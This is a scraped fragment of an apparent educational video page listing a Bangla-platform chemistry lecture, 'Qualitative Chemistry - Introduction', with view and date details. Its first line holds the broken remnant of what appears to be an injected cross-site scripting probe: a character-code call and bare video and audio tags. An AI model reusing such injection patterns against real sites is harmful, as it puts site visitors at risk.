73, 99, 101))[removed] <video src=1 > <audio src=1 >

Next Videos

Qualitative Chemistry - Introduction

By Mahfuzul Hoque

 9   7

Views:9843

Published date  Nov3 2014


Developed by TechCare
© 2019 OnnoRokom Group / All rights reserved.

Follow Us On